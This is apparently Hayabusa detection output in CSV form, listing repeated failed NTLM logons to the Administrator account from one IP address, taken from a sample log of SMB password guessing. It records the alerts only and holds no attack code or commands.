2016-09-20 01:50:18.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NVDE3fIoUQfLn3cd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.175 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UlD48O0XpFUnuSmo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.213 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KyTPKuspADmLpv0L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BdIAPiH32ZbmCgTK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1dEiN2xOA4E9Wl5p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fBeAez2fLjXB0dk3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gQ45aeMDc3Snabvv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QWSYdr4lJlhCLMMW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RgxHY7072aUCdfa0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9yKhEodJDTVCGdIG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z0odyPQmvkGRNWZF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.630 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b5uRpG0fxCK75DPV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d9dcEzpJRW5YA8Bj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hv3B9bwB1YIaBa6N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.743 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lJf9Obml4aVxE5zp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mvnSOaRSkGU6Uf5q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.808 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JSAkZsZsv0SaLKaO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.847 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r6rnM6QbwfbbrcGy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RX0GW7K5wdQJUx4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xm7CpD5i735McsvS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.959 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bHxjZsnR25J47Ez8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J1JWj91m79FyykH6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.043 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h9i0GncOzpz5REWp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BODZRJ6G3xxw29VJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SJ2lq4piINfmI7Qe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NqDeXdOitJ3WY8w4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FnoHQf7QDxoI4tel : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FqkbgrtBa5VFxPry : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TMD57GtY15bfWBre : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.350 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e3lT9UgWr82PcAjf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SpwhTfFlvvccnI5N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 10CfKdnvWf4UVuME : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.539 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YYLMax3okIqntHM1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.602 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qk9TPAK51EdVORwY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aVKRUnNu2nGslW7P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZJ2AYRLcMbMVixg6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.759 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Sl9ucxM2Nu3xjNq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AFeBGB6qA7OaYV7l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.837 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KLUEKG9CzQYsH3Vp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.875 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vVZ44YKdRYY59zaC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: umU8pDDZFvvUVsHY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nn7rA0uRegtHgaF1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2dgiakCKweT4GUGD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.039 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kptipiLujNVePYfy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.091 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: plaXJ1rEGpU3SzV2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I4pALF2luLfg36GC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.173 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZLO4cufbFcRhRy8b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.215 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a845OfrFKxy31Yhg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QnPM7uhs8y4BaP6I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7fW5FzQ4jbWDJxXc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.326 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: huKy3ruTPAlx94pI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g78Kx7hkMuUGIoX1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: erSXtXvMi8Cg1PWw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VaqXgO2US87zoXLl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.501 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QHEfAfFuAR2pX3LO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4Owk2elGaC5DOm1U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VXPynWzVNADN56a4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xwfwZ0hXFaFwqymH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QYlZwLsvrsuqUZ4q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.707 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pvGrzr30eVl5TGhA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.791 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tqdJcHWbdGcIIHBr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YDt69bIJ1yI6PXLg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WtE2uMuOe8QPAKOj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.911 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BWQDlZDgFj9NmMhJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ncQiyLyHCXr8knGa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XjVmLfmcPMYbmdin : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.072 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gU2HjzjDxHsnvENI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.103 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cUPn5CEz2LtwRwvZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.140 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hCz069oBFXqpshbU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.187 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dzhc9PVRVP69tshD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.226 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ejA3ZNfKWEs8zAMX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.265 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U5egiL2PGOrYCHv5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.302 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YYhIM3zla6KcbKbM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WjyQJnVBO4iC9Tkw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.387 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g6Tpp8TRa2nRxHzo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
